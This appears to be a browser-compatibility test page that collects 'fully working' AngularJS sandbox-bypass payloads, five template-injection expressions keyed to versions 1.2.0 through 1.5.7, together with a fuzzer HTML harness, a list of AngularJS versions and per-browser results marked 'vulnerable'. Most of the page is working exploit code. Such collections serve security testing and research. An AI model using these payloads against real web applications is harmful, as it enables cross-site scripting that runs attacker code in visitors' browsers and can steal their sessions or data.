AngularJS Sandbox Bypasses
Fully working bypasses across different versions curated from the community
By
1
Seen 5159 times
Tags
Run this test now.
Results
Chrome
Firefox
Chrome Mobile
Googlebot
Chromium
Safari
Opera
Firefox Mobile
Mobile Safari
This browser ran the most recent scan
Tested on
Chrome - 102 - Mac OS X
| Fuzz data |
|---|
| vulnerable |
This browser ran the most recent scan
Tested on
Firefox - 100 - Ubuntu
| Fuzz data |
|---|
| vulnerable |
This browser ran the most recent scan
Tested on
Chrome Mobile - 102 - Android
| Fuzz data |
|---|
| vulnerable |
Tested on
Googlebot - 2.1 - undefined
| Fuzz data |
|---|
| lol |
Tested on
Chromium - 80 - Linux
| Fuzz data |
|---|
| lol |
Tested on
Safari - 13 - Mac OS X
| Fuzz data |
|---|
| lol |
Tested on
Opera - 54 - Windows 10
| Fuzz data |
|---|
| lol |
Tested on
Firefox Mobile - 68 - Android
| Fuzz data |
|---|
| lol |
This browser ran the most recent scan
Tested on
Mobile Safari - 15.1 - iOS
| Fuzz data |
|---|
| vulnerable |
User Script (FUZZER)
<!DOCTYPE html>
<html>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/***DS_ANGULARJS_VERSIONS***/angular.min.js"></script>
<script>
var ver = '***DS_ANGULARJS_VERSIONS***'.replace(/\./g, '_');
var aVector = ver + " -- a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')";
var bVector = ver + " -- a=\"a\"[\"constructor\"].prototype;a.charAt=a.trim;$eval('a\",alert(alert=1),\"')";
var cVector = ver + " -- c=toString.constructor;p=c.prototype;p.toString=p.call;[\"a\",\"alert(1)\"].sort(c)";
var dVector = ver + " -- (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()";
var eVector = ver + " -- a=\"a\"[\"constructor\"].prototype;a.charAt=a.trim;$eval('a\",alert(alert=1),\"')";
aVector=bVector=cVector=dVector=eVector='vulnerable';
</script>
<body>
<div ng-app="">
// a - Versions 1.3.0 - 1.5.7:
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,addResult(aVector),a')}}
// b - Versions 1.2.20 - 1.2.29:
{{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",addResult(alert=bVector),"')}}
// c - Version 1.2.19:
{{c=toString.constructor;p=c.prototype;p.toString=p.call;["a","addResult(cVector)"].sort(c)}}
// d - Versions 1.2.6 - 1.2.18:
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'addResult(dVector)')()}}
// e - Versions 1.2.0 - 1.2.5:
{{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",addResult(alert=eVector),"')}}
<p>Input something in the input box:</p>
<p>Name: <input type="text" ng-model="name"></p>
<p ng-bind="name"></p>
</div>
</body>
</html>
Fuzz Data (FUZZER)
var DS_ANGULARJS_VERSIONS = ["1.5.7", "1.5.6", "1.5.5", "1.5.4", "1.5.3", "1.5.2", "1.5.1", "1.5.0", "1.4.12", "1.4.11", "1.4.10", "1.4.9", "1.4.8", "1.4.7", "1.4.6", "1.4.5", "1.4.4", "1.4.3", "1.4.2", "1.4.1", "1.4.0", "1.3.17", "1.3.16", "1.3.15", "1.3.14", "1.3.13", "1.3.12", "1.3.11", "1.3.10", "1.3.9", "1.3.8", "1.3.7", "1.3.6", "1.3.5", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.27", "1.2.26", "1.2.25", "1.2.24", "1.2.23", "1.2.22", "1.2.21", "1.2.20", "1.2.19", "1.2.18", "1.2.17", "1.2.16", "1.2.15", "1.2.14", "1.2.13", "1.2.12", "1.2.11", "1.2.10", "1.2.9", "1.2.8", "1.2.7", "1.2.6", "1.2.5", "1.2.4", "1.2.3", "1.2.2", "1.2.1", "1.2.0", "1.0.8", "1.0.7", "1.0.6", "1.0.5", "1.0.4", "1.0.3", "1.0.2", "1.0.1"];